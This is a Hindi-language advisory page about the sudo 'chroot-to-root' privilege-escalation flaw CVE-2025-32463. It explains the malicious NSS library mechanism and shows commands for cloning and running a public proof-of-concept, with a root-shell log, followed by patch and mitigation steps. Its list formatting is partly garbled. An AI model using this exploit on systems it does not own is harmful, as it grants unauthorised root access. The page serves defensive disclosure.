
CVE-2025-32463

सबसे व्यापक रूप से उपयोग किए जाने वाले लिनक्स प्रिविलेज मैनेजर में महत्वपूर्ण स्थानीय विशेषाधिकार वृद्धि
कोई भी स्थानीय उपयोगकर्ता (यहाँ तक कि sudoers अनुमतियों के बिना भी) sudo -R का उपयोग करके सेकंडों में रूट बन सकता है
CVE-2025-32463 (जिसे "chroot-to-root" भी कहा जाता है) sudo में एक महत्वपूर्ण स्थानीय विशेषाधिकार वृद्धि भेद्यता है।
यह किसी भी स्थानीय अविशेषाधिकार प्राप्त उपयोगकर्ता को — यहाँ तक कि उन्हें भी जो sudoers में सूचीबद्ध नहीं हैं — केवल -R / --chroot विकल्प का उपयोग करके पूर्ण रूट पहुँच प्रदान करता है।
यह दोष sudo 1.9.14 (जून 2023) में पेश किया गया था और 1.9.17p1 (जून 2025) तक मौजूद था। यह कोई पारंपरिक बग नहीं था, बल्कि नीति जाँचों से पहले उपयोगकर्ता-नियंत्रित chroot के अंदर sudo द्वारा पथ समाधान को संभालने के तरीके का एक खतरनाक दुष्प्रभाव था।
आधिकारिक सुडो सलाहकार: "एक हमलावर sudo के
-Rविकल्प का लाभ उठाकर रूट के रूप में मनमाने कमांड चला सकता है, भले ही वे sudoers फ़ाइल में सूचीबद्ध न हों।"
वास्तविकता जाँच:
यह बग sudo के कमांड-मिलान तर्क में 2023 के परिवर्तन से उत्पन्न हुआ:
-R /path का उपयोग किया जाता है, तो sudo sudoers नीति का पूरी तरह से मूल्यांकन करने से पहले pivot_root() को कॉल करता है।/etc/nsswitch.conf पढ़ता है।/etc/nsswitch.conf (जैसे, passwd: /woot1337)libnss_/woot1337.so.2 जिसमें एक कंस्ट्रक्टर है जो रूट के रूप में चलता है।मुख्य अंतर्दृष्टि: -R विकल्प को बिना sudo अनुमतियों वाले उपयोगकर्ताओं के लिए भी अनुमति दी गई थी, जिससे यह एक आदर्श हमला वेक्टर बन गया।
केवल sudo 1.9.14 से 1.9.17 (1.9.17p1 से पहले)
व्यापक रूप से प्रभावित:
प्रभावित नहीं:
एक-पंक्ति शोषण (स्ट्रैटास्केल CRU से):
# 1 – रिपॉजिटरी क्लोन करें
$ git clone https://github.com/zaryouhashraf/CVE-2025-32463
$ cd CVE-2025-32463
# 2 – डॉकर इमेज बनाएँ और चलाएँ (टैग "sudo-chwoot")
$ sudo chmod +x CVE-2025-32463.sh
$ ./CVE-2025-32463.sh
# 3 – कंटेनर में शोषण चलाएँ (सीधे रूट कमांड चलाता है या आपको रूट शेल में डालता है)
┌──(kali㉿kali)-[~]
└─$ ./CVE-2025-32463.sh
═══════════════════════════════════════════════════════════════
⚠ चेतावनी: CVE-2025-32463 शोषण PoC ⚠
═══════════════════════════════════════════════════════════════
यह स्क्रिप्ट केवल आपके स्वामित्व वाले सिस्टम पर अधिकृत परीक्षण के लिए है।
अनधिकृत सिस्टम पर चलाना गैरकानूनी है।
परीक्षण के तुरंत बाद पैच करें (sudo 1.9.17p1+)।
[+] अस्थायी शोषण चरण बनाया जा रहा है...
[+] दुर्भावनापूर्ण NSS लाइब्रेरी संकलित की जा रही है...
[+] sudo -R ट्रिगर किया जा रहा है... (रूट शेल की अपेक्षा करें)
(यदि सफल होता है, तो आप एक रूट bash प्रॉम्प्ट में पहुँच जाएँगे)
[!] CVE-2025-32463 ट्रिगर - रूट प्राप्त किया जा रहा है...
[+] अब आप रूट हैं!
┌──(root㉿kali)-[/]
└─# whoami
root
sudo -V | head -n 1
✅ सुरक्षित यदि 1.9.17p1 या नया (या ≤ 1.9.13)
डेबियन/उबंटू:
sudo apt update && sudo apt install --reinstall sudo
फेडोरा/RHEL:
sudo dnf update sudo
आर्क:
sudo pacman -S sudo
/etc/sudoers (या /etc/sudoers.d/ में एक फ़ाइल) में जोड़ें:
Defaults !use_chroot
किसी भी CHROOT= या runchroot= पंक्तियों की खोज करें और हटाएँ।
2026 प्रो टिप: पुरानी डॉकर इमेज, CI रनर और लीगेसी VM को स्कैन करें — कई अभी भी असुरक्षित sudo स्नैपशॉट भेजते हैं।
--chroot) अटैक सरफेस बन सकती हैं यदि अलग न की जाएँ।इस घटना ने मुख्य सिस्टम टूल्स में भी न्यूनतम विशेषाधिकार के सिद्धांत की आवश्यकता को पुष्ट किया।
मार्च 2026 तक स्थिति: ✅ सभी आधुनिक सिस्टम पर पूरी तरह से शमन • Chroot सुविधा अवमूल्यन • पारिस्थितिकी तंत्र सुरक्षित
उन लिनक्स प्रशासकों के लिए ❤️ के साथ बनाया गया जिन्होंने KEV हिट होने से पहले पैच किया
| तारीख | घटना |
|---|
| जून 2023 | sudo 1.9.14 जारी (बग पेश) |
| 1 अप्रैल, 2025 | रिच मिर्च ने निजी तौर पर रिपोर्ट किया |
| 8 अप्रैल, 2025 | CVE-2025-32463 निर्धारित |
| 9 जून, 2025 | पैच प्रस्तावित |
| 30 जून, 2025 | सार्वजनिक प्रकटीकरण + स्ट्रैटास्केल ब्लॉग + पूर्ण PoC |
| जुलाई 2025 | sudo 1.9.17p1 जारी; प्रमुख डिस्ट्रो ने अपडेट भेजे |
| 29 सितंबर, 2025 | CISA KEV कैटलॉग में जोड़ा गया |
| 2026 | Chroot सुविधा पूरे पारिस्थितिकी तंत्र में पूरी तरह से अवमूल्यन |